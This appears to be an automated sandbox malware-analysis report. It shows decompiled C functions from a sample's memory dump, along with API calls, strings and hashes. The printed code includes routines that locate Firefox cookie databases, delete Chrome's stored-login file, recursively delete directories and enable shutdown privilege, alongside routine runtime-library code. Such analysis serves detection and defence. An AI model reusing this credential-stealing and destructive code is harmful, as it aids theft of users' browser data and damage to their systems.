                • Instruction ID: dba20098d3e66f28599fd06314c57e2e3311d68971aa7dbf5ba53787a6468409
                • Opcode Fuzzy Hash: 85ca114e2818de7ccd32f15da29a077d45459a29e699abf73d51743d0292195a
                • Instruction Fuzzy Hash: 79816371508301ABC304EB61D8959AFB7E8FF94708F50082EF596521D2EF74EA49CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 89%
                			E00450E90(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed int _a4, short* _a8, char _a12) {
                				signed int _v8;
                				int _v12;
                				int _v16;
                				char _v20;
                				signed int* _v24;
                				short* _v28;
                				void* __ebp;
                				signed int _t39;
                				void* _t45;
                				signed int* _t46;
                				signed int _t47;
                				short* _t48;
                				int _t49;
                				short* _t56;
                				short* _t57;
                				short* _t58;
                				int _t66;
                				int _t68;
                				short* _t72;
                				intOrPtr _t75;
                				void* _t77;
                				short* _t78;
                				intOrPtr _t85;
                				short* _t89;
                				short* _t92;
                				void* _t94;
                				short** _t102;
                				short* _t103;
                				signed int _t105;
                				signed short _t108;
                				signed int _t109;
                				void* _t110;
                
                				_t39 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t39 ^ _t109;
                				_t3 =  &_a12; // 0x44336d
                				_t89 =  *_t3;
                				_t105 = _a4;
                				_v28 = _a8;
                				_v24 = E00446A95(_t89, __ecx, __edx) + 0x50;
                				asm("stosd");
                				asm("stosd");
                				asm("stosd");
                				_t45 = E00446A95(_t89, __ecx, __edx);
                				_t8 =  &_v20; // 0x44336d
                				_t99 = 0;
                				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
                				_t92 = _t105 + 0x80;
                				_t46 = _v24;
                				 *_t46 = _t105;
                				_t102 =  &(_t46[1]);
                				 *_t102 = _t92;
                				if(_t92 != 0 &&  *_t92 != 0) {
                					_t85 =  *0x45e314; // 0x17
                					E00450E33(0, 0x45e200, _t85 - 1, _t102);
                					_t46 = _v24;
                					_t110 = _t110 + 0xc;
                					_t99 = 0;
                				}
                				_v20 = _t99;
                				_t47 =  *_t46;
                				if(_t47 == 0 ||  *_t47 == _t99) {
                					_t48 =  *_t102;
                					__eflags = _t48;
                					if(_t48 == 0) {
                						L19:
                						_v20 = 0x104;
                						_t49 = GetUserDefaultLCID();
                						_v12 = _t49;
                						_v16 = _t49;
                						goto L20;
                					}
                					__eflags =  *_t48 - _t99;
                					if( *_t48 == _t99) {
                						goto L19;
                					}
                					_t21 =  &_v20; // 0x44336d
                					E004507D0(_t92, _t99, _t21);
                					_pop(_t92);
                					goto L20;
                				} else {
                					_t72 =  *_t102;
                					if(_t72 == 0 ||  *_t72 == _t99) {
                						_t16 =  &_v20; // 0x44336d
                						E004508B6(_t92, _t99, _t16);
                					} else {
                						_t15 =  &_v20; // 0x44336d
                						E0045081B(_t92, _t99, _t15);
                					}
                					_pop(_t92);
                					if(_v20 != 0) {
                						_t103 = 0;
                						__eflags = 0;
                						goto L25;
                					} else {
                						_t75 =  *0x45e1fc; // 0x41
                						_t77 = E00450E33(_t99, 0x45def0, _t75 - 1, _v24);
                						_t110 = _t110 + 0xc;
                						if(_t77 == 0) {
                							L20:
                							_t103 = 0;
                							__eflags = 0;
                							L21:
                							if(_v20 != 0) {
                								L25:
                								asm("sbb esi, esi");
                								_t108 = E00450CBC(_t92,  ~_t105 & _t105 + 0x00000100,  &_v20);
                								_pop(_t94);
                								__eflags = _t108;
                								if(_t108 == 0) {
                									goto L22;
                								}
                								__eflags = _t108 - 0xfde8;
                								if(_t108 == 0xfde8) {
                									goto L22;
                								}
                								__eflags = _t108 - 0xfde9;
                								if(_t108 == 0xfde9) {
                									goto L22;
                								}
                								_t56 = IsValidCodePage(_t108 & 0x0000ffff);
                								__eflags = _t56;
                								if(_t56 == 0) {
                									goto L22;
                								}
                								_t57 = IsValidLocale(_v16, 1);
                								__eflags = _t57;
                								if(_t57 == 0) {
                									goto L22;
                								}
                								_t58 = _v28;
                								__eflags = _t58;
                								if(__eflags != 0) {
                									 *_t58 = _t108;
                								}
                								E004473C9(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_v24[0x94]), 0x55, _t103);
                								__eflags = _t89;
                								if(__eflags == 0) {
                									L36:
                									L23:
                									return E004338BB(_v8 ^ _t109);
                								}
                								E004473C9(_t89, _t94, _t99, _t103, _t108, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
                								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
                								__eflags = _t66;
                								if(_t66 == 0) {
                									goto L22;
                								}
                								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
                								__eflags = _t68;
                								if(_t68 == 0) {
                									goto L22;
                								}
                								E004407BF( &(_t89[0x80]), _t108,  &(_t89[0x80]), 0x10, 0xa);
                								goto L36;
                							}
                							L22:
                							goto L23;
                						}
                						_t78 =  *_t102;
                						_t103 = 0;
                						if(_t78 == 0 ||  *_t78 == 0) {
                							E004508B6(_t92, _t99,  &_v20);
                						} else {
                							E0045081B(_t92, _t99,  &_v20);
                						}
                						_pop(_t92);
                						goto L21;
                					}
                				}
                			}




































                APIs
                  • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                  • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                  • Part of subcall function 00446A95: _free.LIBCMT ref: 00446AF4
                  • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B01
                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00450F9C
                • IsValidCodePage.KERNEL32(00000000), ref: 00450FF7
                • IsValidLocale.KERNEL32(?,00000001), ref: 00451006
                • GetLocaleInfoW.KERNEL32(?,00001001,m3D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045104E
                • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045106D
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                • String ID: m3D$m3D$m3D
                • API String ID: 745075371-2721598275
                • Opcode ID: baefcfb835bb3a09e5ce8c29470c4481051489c84fe072596f635a628af4b507
                • Instruction ID: ce2d0ce6400888a1d824562178e0f2167d8bdbd9356f1224e449ae4cf6748fee
                • Opcode Fuzzy Hash: baefcfb835bb3a09e5ce8c29470c4481051489c84fe072596f635a628af4b507
                • Instruction Fuzzy Hash: 1851A6769002059BEB30DFA5CC45ABFB7B8AF04702F14446BFD04E7292D7B89948CB69
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0040B8C7(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
                				char _v28;
                				char _v52;
                				char _v76;
                				char _v100;
                				char _v124;
                				char _v148;
                				struct _WIN32_FIND_DATAW _v740;
                				void* __edi;
                				void* __ebp;
                				signed int _t37;
                				signed int _t39;
                				signed int _t41;
                				void* _t42;
                				void* _t93;
                				void* _t94;
                				void* _t95;
                				void* _t96;
                
                				_t61 = __ebx;
                				_t95 = __ecx;
                				E0040415E(__ebx,  &_v28, __edx, _t96, E0043A99F(__ebx, __ecx, __eflags, L"AppData"));
                				L004086C6(__ebx,  &_v28, _t93, _t96, L"\\Mozilla\\Firefox\\Profiles\\");
                				_t91 =  &_v28;
                				_t94 = FindFirstFileW(E00401EE4(E004087F0( &_v100,  &_v28, _t96, "*")),  &_v740);
                				E00401EE9();
                				if(_t94 != 0xffffffff) {
                					E004020BF(_t61,  &_v76);
                					while(1) {
                						_t37 = FindNextFileW(_t94,  &_v740);
                						__eflags = _t37;
                						if(_t37 == 0) {
                							break;
                						}
                						__eflags = _v740.dwFileAttributes & 0x00000010;
                						if((_v740.dwFileAttributes & 0x00000010) == 0) {
                							continue;
                						} else {
                							_t39 = E0043E224( &(_v740.cFileName),  &(_v740.cFileName), 0x4644f0);
                							__eflags = _t39;
                							if(_t39 == 0) {
                								continue;
                							} else {
                								_t41 = E0043E224( &(_v740.cFileName),  &(_v740.cFileName), L"..");
                								__eflags = _t41;
                								if(_t41 == 0) {
                									continue;
                								} else {
                									_t42 = E0040415E(_t61,  &_v148, _t91, _t96, L"\\cookies.sqlite");
                									_t91 = E004087F0( &_v124,  &_v28, _t96,  &(_v740.cFileName));
                									E00402F85( &_v52, _t44, _t42);
                									E00401EE9();
                									E00401EE9();
                									__eflags = PathFileExistsW(E00401EE4( &_v52));
                									if(__eflags != 0) {
                										FindClose(_t94);
                										E00403242(_t61, _t95, _t96, __eflags,  &_v52);
                										E00401EE9();
                									} else {
                										E00401EE9();
                										continue;
                									}
                								}
                							}
                						}
                						L10:
                						E00401FB8();
                						goto L11;
                					}
                					FindClose(_t94);
                					E0040415E(_t61, _t95, _t91, _t96, 0x46a8f0);
                					goto L10;
                				} else {
                					E0040415E(_t61, _t95,  &_v28, _t96, 0x46a8f0);
                				}
                				L11:
                				E00401EE9();
                				return _t95;
                			}





















                APIs
                • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B915
                • FindNextFileW.KERNEL32(00000000,?), ref: 0040B9E8
                • FindClose.KERNEL32(00000000), ref: 0040B9F7
                • FindClose.KERNEL32(00000000), ref: 0040BA22
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Find$CloseFile$FirstNext
                • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                • API String ID: 1164774033-405221262
                • Opcode ID: c6b35922493ba9ddbbeef7d75a72d5dd9f157759eec42a5c671cc846564c5eaf
                • Instruction ID: f7360795b1d381be77360ebb1d09811b65db7e4dd05c1cd4fb36acbf7292fd34
                • Opcode Fuzzy Hash: c6b35922493ba9ddbbeef7d75a72d5dd9f157759eec42a5c671cc846564c5eaf
                • Instruction Fuzzy Hash: 02315031A042195ACB14F7A2DC9AAEE77B8EF50718F10047FF501B21D2EF789A458A9D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E0041AC0A(WCHAR* __ecx, void* __edx) {
                				short _v524;
                				short _v1044;
                				struct _WIN32_FIND_DATAW _v1636;
                				int _t41;
                				long _t42;
                				int _t51;
                				signed int _t60;
                				void* _t70;
                				WCHAR* _t71;
                				void* _t72;
                
                				_t70 = __edx;
                				_t71 = __ecx;
                				E0043E0D9( &_v1044, __ecx);
                				E0043E0FB( &_v1044, L"\\*");
                				E0043E0D9( &_v524, _t71);
                				E0043E0FB( &_v524, "\\");
                				_t72 = FindFirstFileW( &_v1044,  &_v1636);
                				if(_t72 == 0xffffffff) {
                					L16:
                					__eflags = 0;
                					return 0;
                				}
                				E0043E0D9( &_v1044,  &_v524);
                				_t60 = 1;
                				do {
                					_t41 = FindNextFileW(_t72,  &_v1636);
                					_t76 = _t41;
                					if(_t41 == 0) {
                						_t42 = GetLastError();
                						__eflags = _t42 - 0x12;
                						if(_t42 != 0x12) {
                							L15:
                							FindClose(_t72);
                							goto L16;
                						}
                						_t60 = 0;
                						__eflags = 0;
                						goto L13;
                					}
                					if(E0041ABDC( &(_v1636.cFileName), _t76) != 0) {
                						goto L13;
                					}
                					E0043E0FB( &_v524,  &(_v1636.cFileName));
                					if((_v1636.dwFileAttributes & 0x00000010) == 0) {
                						__eflags = _v1636.dwFileAttributes & 0x00000001;
                						if((_v1636.dwFileAttributes & 0x00000001) != 0) {
                							SetFileAttributesW( &_v524, 0x80);
                						}
                						_t51 = DeleteFileW( &_v524);
                						__eflags = _t51;
                						if(_t51 == 0) {
                							goto L15;
                						} else {
                							L10:
                							E0043E0D9( &_v524,  &_v1044);
                							goto L13;
                						}
                					}
                					if(E0041AC0A( &_v524, _t70) == 0) {
                						goto L15;
                					}
                					RemoveDirectoryW( &_v524);
                					goto L10;
                					L13:
                				} while (_t60 != 0);
                				FindClose(_t72);
                				return RemoveDirectoryW(_t71);
                			}

                APIs
                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC65
                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AC95
                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD07
                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD14
                  • Part of subcall function 0041AC0A: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00473220,00473238,00000001), ref: 0041ACEA
                • GetLastError.KERNEL32(?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD35
                • FindClose.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD4B
                • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD52
                • FindClose.KERNEL32(00000000,?,?,?,?,?,00473220,00473238,00000001), ref: 0041AD5B
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                • String ID:
                • API String ID: 2341273852-0
                • Opcode ID: 0f390db9b924e7f4cc6de0f128792a69a8e67dbc017e2262d63da9aebc2805e1
                • Instruction ID: 3339c7fc43e202b61d2d70908da88035b8b5669b3a5f9347cfb7e72bae01768d
                • Opcode Fuzzy Hash: 0f390db9b924e7f4cc6de0f128792a69a8e67dbc017e2262d63da9aebc2805e1
                • Instruction Fuzzy Hash: 5E31A07280622C9ACB20E761AC48EDB777CAF04305F0401FBF545D2191EF78DAD48A5A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 76%
                			E00447A10(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
                				signed int _v8;
                				signed int _v12;
                				int _v16;
                				int _v20;
                				int _v24;
                				char _v52;
                				int _v56;
                				int _v60;
                				signed int _v100;
                				char _v272;
                				intOrPtr _v276;
                				char _v280;
                				char _v356;
                				char _v360;
                				void* __ebp;
                				signed int _t65;
                				signed int _t72;
                				signed int _t74;
                				signed int _t78;
                				signed int _t85;
                				signed int _t89;
                				signed int _t91;
                				long _t93;
                				signed int* _t96;
                				signed int _t99;
                				signed int _t102;
                				signed int _t106;
                				void* _t113;
                				signed int _t116;
                				void* _t117;
                				void* _t119;
                				void* _t120;
                				void* _t122;
                				signed int _t124;
                				signed int _t125;
                				signed int* _t128;
                				signed int _t129;
                				void* _t132;
                				void* _t134;
                				signed int _t135;
                				signed int _t137;
                				void* _t140;
                				intOrPtr _t141;
                				void* _t143;
                				signed int _t150;
                				signed int _t151;
                				signed int _t154;
                				signed int _t158;
                				signed int _t161;
                				intOrPtr* _t166;
                				signed int _t167;
                				intOrPtr* _t168;
                				void* _t169;
                				intOrPtr _t170;
                				void* _t171;
                				signed int _t172;
                				int _t176;
                				signed int _t178;
                				char** _t179;
                				signed int _t183;
                				signed int _t184;
                				void* _t191;
                				signed int _t192;
                				void* _t193;
                				signed int _t194;
                
                				_t178 = __esi;
                				_t171 = __edi;
                				_t65 = E0044764F();
                				_v8 = _v8 & 0x00000000;
                				_t137 = _t65;
                				_v16 = _v16 & 0x00000000;
                				_v12 = _t137;
                				if(E004476AD( &_v8) != 0 || E00447655( &_v16) != 0) {
                					L46:
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					_push(0);
                					E0043A5E8();
                					asm("int3");
                					_t191 = _t193;
                					_t194 = _t193 - 0x10;
                					_push(_t137);
                					_t179 = E0044764F();
                					_v52 = 0;
                					_v56 = 0;
                					_v60 = 0;
                					_t72 = E004476AD( &_v52);
                					_t143 = _t178;
                					__eflags = _t72;
                					if(_t72 != 0) {
                						L66:
                						_push(0);
                						_push(0);
                						_push(0);
                						_push(0);
                						_push(0);
                						E0043A5E8();
                						asm("int3");
                						_push(_t191);
                						_t192 = _t194;
                						_t74 =  *0x46f00c; // 0xd60a1515
                						_v100 = _t74 ^ _t192;
                						 *0x46f344 =  *0x46f344 | 0xffffffff;
                						 *0x46f338 =  *0x46f338 | 0xffffffff;
                						_push(0);
                						_push(_t179);
                						_push(_t171);
                						_t139 = "TZ";
                						_t172 = 0;
                						 *0x470758 = 0;
                						_t78 = E0043A9B5(__eflags,  &_v360,  &_v356, 0x100, "TZ");
                						__eflags = _t78;
                						if(_t78 != 0) {
                							__eflags = _t78 - 0x22;
                							if(_t78 == 0x22) {
                								_t184 = E00444A38(_t143, _v276);
                								__eflags = _t184;
                								if(__eflags != 0) {
                									_t85 = E0043A9B5(__eflags,  &_v280, _t184, _v276, _t139);
                									__eflags = _t85;
                									if(_t85 == 0) {
                										E00445002(0);
                										_t172 = _t184;
                									} else {
                										_push(_t184);
                										goto L72;
                									}
                								} else {
                									_push(0);
                									L72:
                									E00445002();
                								}
                							}
                						} else {
                							_t172 =  &_v272;
                						}
                						asm("sbb esi, esi");
                						_t183 =  ~(_t172 -  &_v272) & _t172;
                						__eflags = _t172;
                						if(_t172 == 0) {
                							L80:
                							L47();
                						} else {
                							__eflags =  *_t172;
                							if(__eflags == 0) {
                								goto L80;
                							} else {
                								_push(_t172);
                								E00447A10(_t139, _t172, _t183, __eflags);
                							}
                						}
                						E00445002(_t183);
                						__eflags = _v16 ^ _t192;
                						return E004338BB(_v16 ^ _t192);
                					} else {
                						_t89 = E00447655( &_v16);
                						_pop(_t143);
                						__eflags = _t89;
                						if(_t89 != 0) {
                							goto L66;
                						} else {
                							_t91 = E00447681( &_v20);
                							_pop(_t143);
                							__eflags = _t91;
                							if(_t91 != 0) {
                								goto L66;
                							} else {
                								E00445002( *0x470750);
                								 *0x470750 = 0;
                								 *_t194 = 0x470760;
                								_t93 = GetTimeZoneInformation(??);
                								__eflags = _t93 - 0xffffffff;
                								if(_t93 != 0xffffffff) {
                									_t150 =  *0x470760 * 0x3c;
                									_t167 =  *0x4707b4; // 0x0
                									_push(_t171);
                									 *0x470758 = 1;
                									_v12 = _t150;
                									__eflags =  *0x4707a6; // 0x0
                									if(__eflags != 0) {
                										_t151 = _t150 + _t167 * 0x3c;
                										__eflags = _t151;
                										_v12 = _t151;
                									}
                									__eflags =  *0x4707fa; // 0x0
                									if(__eflags == 0) {
                										L56:
                										_v16 = 0;
                										_v20 = 0;
                									} else {
                										_t106 =  *0x470808; // 0x0
                										__eflags = _t106;
                										if(_t106 == 0) {
                											goto L56;
                										} else {
                											_v16 = 1;
                											_v20 = (_t106 - _t167) * 0x3c;
                										}
                									}
                									_t176 = E00444607(0, _t167);
                									_t99 = WideCharToMultiByte(_t176, 0, 0x470764, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
                									__eflags = _t99;
                									if(_t99 == 0) {
                										L60:
                										 *( *_t179) = 0;
                									} else {
                										__eflags = _v24;
                										if(_v24 != 0) {
                											goto L60;
                										} else {
                											( *_t179)[0x3f] = 0;
                										}
                									}
                									_t102 = WideCharToMultiByte(_t176, 0, 0x4707b8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
                									__eflags = _t102;
                									if(_t102 == 0) {
                										L64:
                										 *(_t179[1]) = 0;
                									} else {
                										__eflags = _v24;
                										if(_v24 != 0) {
                											goto L64;
                										} else {
                											_t179[1][0x3f] = 0;
                										}
                									}
                								}
                								 *(E00447649()) = _v12;
                								 *((intOrPtr*)(E0044763D())) = _v16;
                								_t96 = E00447643();
                								 *_t96 = _v20;
                								return _t96;
                							}
                						}
                					}
                				} else {
                					_t168 =  *0x470750; // 0x0
                					_t178 = _a4;
                					if(_t168 == 0) {
                						L12:
                						E00445002(_t168);
                						_t154 = _t178;
                						_t12 = _t154 + 1; // 0x447e01
                						_t169 = _t12;
                						do {
                							_t113 =  *_t154;
                							_t154 = _t154 + 1;
                						} while (_t113 != 0);
                						_t13 = _t154 - _t169 + 1; // 0x447e02
                						 *0x470750 = E00444A38(_t154 - _t169, _t13);
                						_t116 = E00445002(0);
                						_t170 =  *0x470750; // 0x0
                						if(_t170 == 0) {
                							goto L45;
                						} else {
                							_t158 = _t178;
                							_push(_t171);
                							_t14 = _t158 + 1; // 0x447e01
                							_t171 = _t14;
                							do {
                								_t117 =  *_t158;
                								_t158 = _t158 + 1;
                							} while (_t117 != 0);
                							_t15 = _t158 - _t171 + 1; // 0x447e02
                							_t119 = E0044030E(_t170, _t15, _t178);
                							_t193 = _t193 + 0xc;
                							if(_t119 == 0) {
                								_t171 = 3;
                								_push(_t171);
                								_t120 = E00440303(_t159,  *_t137, 0x40, _t178);
                								_t193 = _t193 + 0x10;
                								if(_t120 == 0) {
                									while( *_t178 != 0) {
                										_t178 = _t178 + 1;
                										_t171 = _t171 - 1;
                										if(_t171 != 0) {
                											continue;
                										}
                										break;
                									}
                									_pop(_t171);
                									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
                									if(_t137 != 0) {
                										_t178 = _t178 + 1;
                									}
                									_t161 = E0043A3AC(_t159, _t178) * 0xe10;
                									_v8 = _t161;
                									while(1) {
                										_t122 =  *_t178;
                										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
                											break;
                										}
                										_t178 = _t178 + 1;
                									}
                									__eflags =  *_t178 - 0x3a;
                									if( *_t178 == 0x3a) {
                										_t178 = _t178 + 1;
                										_t161 = _v8 + E0043A3AC(_t161, _t178) * 0x3c;
                										_v8 = _t161;
                										while(1) {
                											_t132 =  *_t178;
                											__eflags = _t132 - 0x30;
                											if(_t132 < 0x30) {
                												break;
                											}
                											__eflags = _t132 - 0x39;
                											if(_t132 <= 0x39) {
                												_t178 = _t178 + 1;
                												__eflags = _t178;
                												continue;
                											}
                											break;
                										}
                										__eflags =  *_t178 - 0x3a;
                										if( *_t178 == 0x3a) {
                											_t178 = _t178 + 1;
                											_t161 = _v8 + E0043A3AC(_t161, _t178);
                											_v8 = _t161;
                											while(1) {
                												_t134 =  *_t178;
                												__eflags = _t134 - 0x30;
                												if(_t134 < 0x30) {
                													goto L38;
                												}
                												__eflags = _t134 - 0x39;
                												if(_t134 <= 0x39) {
                													_t178 = _t178 + 1;
                													__eflags = _t178;
                													continue;
                												}
                												goto L38;
                											}
                										}
                									}
                									L38:
                									__eflags = _t137;
                									if(_t137 != 0) {
                										_v8 = _t161;
                									}
                									__eflags =  *_t178;
                									_t124 = 0 |  *_t178 != 0x00000000;
                									_v16 = _t124;
                									__eflags = _t124;
                									_t125 = _v12;
                									if(_t124 == 0) {
                										_t29 = _t125 + 4; // 0xfffffddd
                										 *((char*)( *_t29)) = 0;
                										L44:
                										 *(E00447649()) = _v8;
                										_t128 = E0044763D();
                										 *_t128 = _v16;
                										return _t128;
                									}
                									_push(3);
                									_t28 = _t125 + 4; // 0xfffffddd
                									_t129 = E00440303(_t161,  *_t28, 0x40, _t178);
                									_t193 = _t193 + 0x10;
                									__eflags = _t129;
                									if(_t129 == 0) {
                										goto L44;
                									}
                								}
                							}
                							goto L46;
                						}
                					} else {
                						_t166 = _t168;
                						_t135 = _t178;
                						while(1) {
                							_t140 =  *_t135;
                							if(_t140 !=  *_t166) {
                								break;
                							}
                							if(_t140 == 0) {
                								L8:
                								_t116 = 0;
                							} else {
                								_t9 = _t135 + 1; // 0xdde805eb
                								_t141 =  *_t9;
                								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
                									break;
                								} else {
                									_t135 = _t135 + 2;
                									_t166 = _t166 + 2;
                									if(_t141 != 0) {
                										continue;
                									} else {
                										goto L8;
                									}
                								}
                							}
                							L10:
                							if(_t116 == 0) {
                								L45:
                								return _t116;
                							} else {
                								_t137 = _v12;
                								goto L12;
                							}
                							goto L82;
                						}
                						asm("sbb eax, eax");
                						_t116 = _t135 | 0x00000001;
                						__eflags = _t116;
                						goto L10;
                					}
                				}
                				L82:
                			}
                0x00447a83
                0x00447a83
                0x00000000
                0x00447a83
                0x00447a5b
                0x00000000

                APIs
                • _free.LIBCMT ref: 00447A92
                • _free.LIBCMT ref: 00447AB6
                • _free.LIBCMT ref: 00447C3D
                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D204), ref: 00447C4F
                • WideCharToMultiByte.KERNEL32(00000000,00000000,00470764,000000FF,00000000,0000003F,00000000,?,?), ref: 00447CC7
                • WideCharToMultiByte.KERNEL32(00000000,00000000,004707B8,000000FF,?,0000003F,00000000,?), ref: 00447CF4
                • _free.LIBCMT ref: 00447E09
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                • String ID:
                • API String ID: 314583886-0
                • Opcode ID: 129d8246206faee2f38877ab82131a60def34f9d9ec2b9cdd89c400090bd8217
                • Instruction ID: 0aa257e2c35749d2f3a928c6468fe730eac10fb1cea6214ff30b616faf06b30b
                • Opcode Fuzzy Hash: 129d8246206faee2f38877ab82131a60def34f9d9ec2b9cdd89c400090bd8217
                • Instruction Fuzzy Hash: 14C15971908245ABFB149F79DC41AAB7BA9EF41318F1440AFE484A7341E7389E43CB9C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 82%
                			E0040AF8C(void* __edx, void* __edi, void* __eflags) {
                				char _v28;
                				char _v52;
                				void* __ebx;
                				void* __ebp;
                				long _t18;
                				void* _t20;
                				void* _t21;
                				void* _t28;
                				void* _t32;
                				void* _t33;
                				void* _t34;
                
                				_t37 = __eflags;
                				_t32 = __edi;
                				_t31 = E00402073(_t20,  &_v52, __edx, _t33, E0043A9AA(_t20, __eflags, "UserProfile"));
                				E00408832(_t20,  &_v28, _t7, _t32, _t33, _t37, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
                				E00401FB8();
                				if(DeleteFileA(E00401F8B( &_v28)) != 0) {
                					_t28 = _t34 - 0x18;
                					_push("\n[Chrome StoredLogins found, cleared!]");
                					goto L6;
                				} else {
                					_t18 = GetLastError();
                					if(_t18 == 0 || _t18 == 1) {
                						_t28 = _t34 - 0x18;
                						_push("\n[Chrome StoredLogins not found]");
                						L6:
                						E00402073(_t20, _t28, _t31, _t33);
                						E0040B752(_t20, _t31, _t33, __eflags);
                						_t21 = 1;
                					} else {
                						_t21 = 0;
                					}
                				}
                				E00401FB8();
                				return _t21;
                			}















                APIs
                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040AFC8
                • GetLastError.KERNEL32 ref: 0040AFD2
                Strings
                • [Chrome StoredLogins found, cleared!], xrefs: 0040AFF8
                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040AF93
                • [Chrome StoredLogins not found], xrefs: 0040AFEC
                • UserProfile, xrefs: 0040AF98
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: DeleteErrorFileLast
                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                • API String ID: 2018770650-1062637481
                • Opcode ID: e41821ff3410b989b1a412a1a3b9a309f3df184b09367daac72509983c4f29aa
                • Instruction ID: a37d5e526ed20706eeea9cdf9ddb9e73f46e09c9fe60e21e4a2cfacd82ef4b6e
                • Opcode Fuzzy Hash: e41821ff3410b989b1a412a1a3b9a309f3df184b09367daac72509983c4f29aa
                • Instruction Fuzzy Hash: 8001F2B1A802065BCB04B775DC1B8BF7728AD61308B50027FF402B21E2FE39481986CF
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00416840() {
                				void* _v8;
                				intOrPtr _v12;
                				struct _TOKEN_PRIVILEGES _v24;
                
                				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
                				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                				_v24.PrivilegeCount = 1;
                				_v12 = 2;
                				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
                			}







                APIs
                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041684D
                • OpenProcessToken.ADVAPI32(00000000), ref: 00416854
                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416866
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416885
                • GetLastError.KERNEL32 ref: 0041688B
                Strings
